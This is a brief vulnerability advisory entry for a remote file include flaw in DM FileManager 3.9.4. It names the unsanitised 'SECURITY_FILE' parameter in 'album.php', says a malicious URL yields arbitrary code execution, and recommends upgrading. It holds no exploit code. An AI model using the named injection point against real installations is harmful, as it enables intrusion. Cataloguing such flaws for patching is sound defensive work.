vendor:
DM FileManager
by:
Septemb0x
9,3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: DM FileManager
Affected Version From: 3.9.4
Affected Version To: 3.9.4
Patch Exists: Yes
Related CWE: N/A
CPE: a:dutchmonkey:dm_filemanager
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
DM FileManager 3.9.4 Remote File Include Vulnerability
A remote file include vulnerability exists in DM FileManager 3.9.4. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system. The vulnerability is due to insufficient sanitization of user-supplied input passed to the 'SECURITY_FILE' parameter in 'album.php' script. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable system. Successful exploitation results in arbitrary code execution on the vulnerable system.
Mitigation:
Upgrade to the latest version of DM FileManager.
